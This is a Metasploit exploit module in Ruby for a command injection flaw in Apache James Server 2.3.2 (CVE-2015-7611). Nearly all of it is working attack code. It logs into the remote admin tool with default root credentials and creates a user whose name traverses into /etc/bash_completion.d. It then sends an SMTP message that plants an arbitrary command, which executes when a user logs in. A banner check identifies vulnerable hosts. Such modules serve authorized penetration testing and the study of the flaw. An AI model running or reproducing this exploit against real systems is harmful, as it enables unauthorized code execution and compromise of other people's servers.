mattaberegg
115 lines
3.4 KiB
Ruby
115 lines
3.4 KiB
Ruby
##
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = NormalRanking
|
|
|
|
include Msf::Exploit::Remote::Tcp
|
|
include Msf::Exploit::CmdStager
|
|
|
|
def initialize(info={})
|
|
super(update_info(info,
|
|
'Name' => "Apache James Server 2.3.2 Insecure User Creation Command Injection",
|
|
'Description' => %q{
|
|
To use this module, start a listener using the given payload, host, and port before running the exploit. After running the exploit, the payload will be executed when a user logs into the system. This module exploits a vulnerability that exists due to a lack of input validation when creating a user. Messages for a given user are stored in a directory partially defined by the username. By creating a user with a directory traversal payload as the username, commands can be written to a given directory/file. For this exploit, bash completion must be enabled to gain code execution.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' => [ 'Matthew Aberegg', 'Michael Burkey' ],
|
|
'References' =>
|
|
[
|
|
[ 'CVE', '2015-7611'],
|
|
[ 'EDB', '35513'],
|
|
[ 'URL', 'https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf']
|
|
],
|
|
'Platform' => 'linux',
|
|
'Arch' => [ ARCH_X86, ARCH_X64 ],
|
|
'Targets' =>
|
|
[
|
|
[ 'Linux x86', { 'Arch' => ARCH_X86 } ],
|
|
[ 'Linux x64', { 'Arch' => ARCH_X64 } ]
|
|
],
|
|
'Privileged' => true,
|
|
'DisclosureDate' => "Oct 1 2015",
|
|
'DefaultTarget' => 0,
|
|
'CmdStagerFlavor'=> [ 'printf' ],
|
|
'DefaultOptions' =>
|
|
{
|
|
'DisablePayloadHandler' => 'true'
|
|
}
|
|
))
|
|
register_options(
|
|
[
|
|
OptString.new('USERNAME', [ true, 'Root username for James remote administration tool', 'root' ]),
|
|
OptString.new('PASSWORD', [ true, 'Root password for James remote administration tool', 'root' ]),
|
|
OptString.new('ADMINPORT', [ true, 'Port for James remote administration tool', '4555' ])
|
|
])
|
|
deregister_options('SRVHOST', 'SRVPORT')
|
|
end
|
|
|
|
def check
|
|
connect
|
|
banner = sock.get
|
|
if banner.include? "(JAMES SMTP Server 2.3.2)"
|
|
return Exploit::CheckCode::Appears
|
|
else
|
|
return Exploit::CheckCode::Unknown
|
|
end
|
|
disconnect
|
|
end
|
|
|
|
def execute_command(cmd, opts = {})
|
|
username = datastore['USERNAME']
|
|
password = datastore['PASSWORD']
|
|
|
|
connect(true, { 'RHOST'=>datastore['RHOST'], 'RPORT'=>datastore['ADMINPORT'] })
|
|
|
|
sock.get
|
|
|
|
sock.puts(username + "\n")
|
|
sock.get
|
|
|
|
sock.puts(password + "\n")
|
|
sock.get
|
|
|
|
sock.puts("adduser ../../../../../../../../etc/bash_completion.d exploit\n")
|
|
sock.get
|
|
|
|
sock.puts("quit\n")
|
|
disconnect
|
|
|
|
connect
|
|
|
|
sock.puts("ehlo admin@apache.com\r\n")
|
|
sock.get
|
|
|
|
sock.puts("mail from: <'@apache.com>\r\n")
|
|
sock.get
|
|
|
|
sock.puts("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")
|
|
sock.get
|
|
|
|
sock.puts("data\r\n")
|
|
sock.get
|
|
|
|
sock.puts("From: admin@apache.com\r\n")
|
|
sock.puts("\r\n")
|
|
sock.puts("'\n")
|
|
sock.puts("#{cmd}\n")
|
|
sock.puts("\r\n.\r\n")
|
|
sock.get
|
|
|
|
sock.puts("quit\r\n")
|
|
sock.get
|
|
|
|
disconnect
|
|
end
|
|
|
|
def exploit
|
|
execute_cmdstager
|
|
end
|
|
|
|
end
|